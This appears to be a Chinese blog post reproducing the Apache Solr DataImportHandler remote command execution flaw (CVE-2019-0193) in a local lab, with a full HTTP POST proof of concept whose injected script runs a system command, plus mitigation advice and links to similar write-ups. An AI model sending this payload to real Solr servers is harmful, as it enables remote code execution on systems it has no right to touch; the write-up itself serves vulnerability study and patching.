Apache Solr命令执行漏洞复现【CVE-2019-0193】

最新推荐文章于 2026-03-21 14:40:52 发布
原创 最新推荐文章于 2026-03-21 14:40:52 发布 · 488 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#solr #apache #安全漏洞 #网络安全

Solr简介

在这里插入图片描述

Apache Solr是一个企业级搜索平台,用Java编写且开源,基于Apache Lucene项目。

主要功能包括:

  • full-text search 全文搜索

  • hit highlighting

  • faceted search

  • dynamic clustering 动态聚类

  • document parsing 文档解析

Solr可以像数据库一样被使用:

  1. 运行服务器,创建collection1
  2. 从外部获取数据 - 向collection1发送不同类型的数据(例如文本,xml文档,pdf文档等任何格式)
  3. 存储数据并生成索引 - Solr自动索引这些数据并提供快速、丰富的REST API接口,以便于你搜索已有数据。

漏洞简介

Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache
Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。

漏洞编号

cve-2019-0193

影响范围

Apache solr < 8.2.0

漏洞复现

  1. 环境准备
    Solr下载地址
    https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip
    在本地解压,进入solr-7.7.2目录,执行如下命令
  bin/solr -e dih

在这里插入图片描述
然后访问http://127.0.0.1:8983/solr即可访问环境

  1. 漏洞利用
    通过接口命令 curl http://127.0.0.1:8983/solr/admin/cores 来获取所有 core 信息,下面我们构造 payload 需要 name 信息
    在这里插入图片描述
    在Burp中发送以下POC即可执行命令弹出计算器,下面的 <your_core_name> 需要替换为你获取到的 core 的 name(共两处)
POST /solr/<your_core_name>/dataimport HTTP/1.1
Host: 127.0.0.1:8983
Content-Length: 763
User-Agent: Mozilla/5.0
Content-type: application/x-www-form-urlencoded
Connection: close

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process= java.lang.Runtime.getRuntime();
process.exec("calc");
return row;
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>

执行效果如下:
在这里插入图片描述

处置建议

根除:符合利用条件的应用请将Apache Solr升级至8.2.0或之后的版本;
缓解:

  1. 编辑solrconfig.xml,将所有用固定值配置的DataImportHandler用法中的dataConfig参数设置为空字符串。

  2. 确保网络设置只允许可信的流量与Solr进行通信,特别是与DIH请求处理程序的通信。

参考链接

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0193
https://nvd.nist.gov/vuln/detail/CVE-2019-0193
https://blog.csdn.net/qq_43380549/article/details/99429907

Apache Solr 远程命令执行漏洞复现(CVE-2019-0193)
qq_34853514的博客
08-23 704
漏洞简介 漏洞编号: CVE-2019-0193 漏洞详情: Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行漏洞影响范围: Apache Solr < 8.2.0 漏洞
Apache Solr 远程命令执行漏洞 CVE-2019-0193 漏洞复现
ADummy的博客
02-28 676
Apache Solr 远程命令执行漏洞CVE-2019-0193) by ADummy 0x00利用路线 ​ 创建核心—>选择debug模式—>写入exp—>命令执行 0x01漏洞介绍 ​ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能
CVE-2019-0193漏洞复现Apache Solr 远程命令执行漏洞复现
m0_58687645的博客
12-23 1644
0X00漏洞简介 CVE-2019-0193是一个存在于Apache solr搜索引擎中的命令执行漏洞 0X01漏洞原因 Apache solr 是一款开源的搜索服务器并且使用java语言开发;主要的工作方式:用户通过http请求像搜索引擎发出索引条件,solr对条件进行分词 处理,根据分词结果查找索引,继而找到文档   在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患,在apache solr < 8.2.0版本之前DIH配置
solr 远程命令执行 (CVE-2019-17558)
最新发布
2401_88473757的博客
03-21 321
访问http://your-ip:8983/solr/demo/config,用burp抓包修改params.resource.loader.enabled为true,至此一切准备就绪。使用burp抓包或者是直接在url中传入payload,访问http://your-ip:8983/solr/demo/select并抓包传入payload。可以先查看模块的参数,show options,设置相关参数,RHOST,LHOST,直接run运行后成功拿到meterpreter,利用完成!
Apache solr 远程代码执行漏洞CVE-2019-0193复现
weixin_42558965的博客
01-12 996
0x00:复现环境 靶机:CentOS7、docker、vulhub-master 攻击机:windows10 0x01:复现过程(数据包提交) 在/vulhub-master/solr/CVE-2019-0193/下启动镜像: docker-compose up -d 然后攻击机访问靶机IP:8983(默认端口号) 如图访问成功: 随后运行命令: docker-compose exec solr bash bin/solr create_core -c test -d example/example-
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
weixin_44047654的博客
03-03 2124
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
CVE-2019-0193Apache Solr远程命令执行漏洞复现
nex1less的博客
11-26 922
0x01 漏洞描述 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重 0x02 漏洞环境 1.服务器需要安装java环境: https://jingyan.baidu.com/article/375c8e190c1f9525f2a22931.html 2.服务器需要安装curl环境: (1)下载curl包:https...
漏洞复现Apache Solr 远程命令执行漏洞CVE-2019-0193
Pluto.的博客
12-27 5045
文章目录Vulhub漏洞复现Apache Solr远程命令执行漏洞复现(CVE-2019-0193)一、漏洞概述二、漏洞复现1. 复现步骤2. 利用该漏洞getshell Vulhub漏洞复现 Apache Solr远程命令执行漏洞复现(CVE-2019-0193) 一、漏洞概述 Apache Solr搜索服务,它是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口,用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引(solr 中索引库用 core
漏洞复现CVE-2019-0193Apache Solr 远程命令执行漏洞
L120305q的博客
08-12 5953
Apache Solr远程命令执行漏洞CVE-2019-0193
Apache Solr 远程命令执行漏洞复现CVE-2019-0193
Heytoo的博客
06-29 964
Apache Solr 远程命令执行漏洞复现CVE-2019-0193) 0x00 简介 Solr的目标用户:“需要搜索框、分面浏览(导航)或者两者结合的任何人”。 Solr的关键特性包括: 基于标准的开放接口——Solr搜索服务器支持通过XML、JSON和HTTP查询和获取结果。 易管理——Solr可以通过HTML页面管理,服务器统计数据以JMX输出,Solr配置通过XML完成。 分面浏览——搜索结果自动分类。 突出显示命中词——匹配的字符自动在搜索结果中...
其他的 框架安全:Apache Solr 远程代码漏洞.(CVE-2019-0193
网络安全领域___专研者.
05-12 1650
Apache Solr是一个开源的搜索服务,便用Java语言开发,主要基于 HTTP 和ApacheLucene 实现的。Sor是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。
apache solr远程代码执行漏洞(cve-2019-0193)
whatday的专栏
06-25 5810
简介 Apache Solr是一个企业级搜索平台,用Java编写且开源,基于Apache Lucene项目。 主要功能包括: full-text search 全文搜索 hit highlighting faceted search dynamic clustering 动态聚类 document parsing 文档解析 Solr可以像数据库一样被使用: 1.运行服务器,创建collection1 2.从外部获取数据 - 向collection1发送不同类型的数据(例如文本
solr漏洞合集
weixin_46626737的博客
07-02 1232
在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)漏洞版本:Apache Solr 5.0.0 ~8.3.1。漏洞版本:Apache Solr < 8.2.0。3.solr远程代码执行(CVE-2017-12629)5.solr的XXE漏洞CVE-2017-12629)2.solr远程代码执行(CVE-2019-0193漏洞版本:Apache Solr < 7.1。漏洞版本:Apache Solr < 7.1。
CVE-2019-0193 Apache solr velocity模块漏洞&命令执行
Adminxe的博客
05-06 738
@Adminxe 【互联网安全守护计划】 上海XXXXXX有限公司-XXX店 官方网站 存在Apache solr velocity模块远程命令执行漏洞 漏洞描述: 通过发送类似/节点名/config的POST请求对该节点的配置文件做更改 Apache Solr默认集成VelocityResponseWriter插件,在该插件的初始化参数中的params.resource.loade...
CVE-2019-0193源码分析与漏洞复现
spinage的博客
05-29 1677
摘要:CVE-2019-0193Apache Solr DataImportHandler组件中的高危远程代码执行漏洞,影响1.3-8.2.0版本。漏洞根源在于DIH模块未对dataConfig参数的JavaScript脚本进行安全过滤,攻击者可利用Nashorn引擎通过Java.type()调用危险类执行任意代码。触发条件为启用DIH模块且未配置Admin UI认证。漏洞通过/dataimport接口的dataConfig参数注入恶意脚本,关键攻击路径涉及DataImportHandler的请求处理逻辑
Apache Solr 远程命令执行漏洞CVE-2019-0193
黑白的博客
11-22 766
声明 好好学习,天天向上 漏洞描述 Apache solr 是一款开源的搜索服务器并且使用java语言开发;主要的工作方式:用户通过http请求像搜索引擎发出索引条件,solr对条件进行分词 处理,根据分词结果查找索引,继而找到文档 在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患,在apache solr < 8.2.0版本之前DIH配置中dataconfig可以被用户控制 影响范围 Apache solr < 8.2.0 复现
httpinvoker远程调用超时_【漏洞分析】Apache Solr远程代码执行漏洞(CVE20190193)
weixin_29041767的博客
12-01 600
本文作者:77 @奇安信A-TEAM在本篇文章中,我们将对Apache Solr远程代码执行漏洞(CVE-2019-0193)进行分析。声明:本篇文章由 77@奇安信A-TEAM原创,仅用于技术研究,不恰当使用会造成危害,严禁违法使用,否则后果自负。漏洞描述Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜...
Apache Solr远程命令执行漏洞复现CVE-2019-0193,docker 搭建)
suqiban7253的博客
03-14 416
这里写自定义目录标题0x00漏洞简介0x01 漏洞概述0x02影响范围0x03环境搭建0x04漏洞复现0x05 遇到的问题0x06参考 0x00漏洞简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 0x01 漏洞概述 该漏洞的产生是由于两方面的原因: 当攻击者可以直接访问Solr控制台时,可以通过发送类似/节
Apache Solr远程代码执行漏洞CVE-2019-0193复现操作
weixin_45983744的博客
12-11 832
QQ交流学习群:811401950 一. 漏洞描述 2019年11月16日,Apache官方发布Apache Solr远程代码执行漏洞CVE-2019-0193)安全通告,此漏洞存在于可选模块DataImportHandler 中,DataImportHandler是用于从数据库或其他源提取数据的常用模块,该模块中所有DIH配置都可以通过外部请求的dataConfig参 数来设置,由于DIH配置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值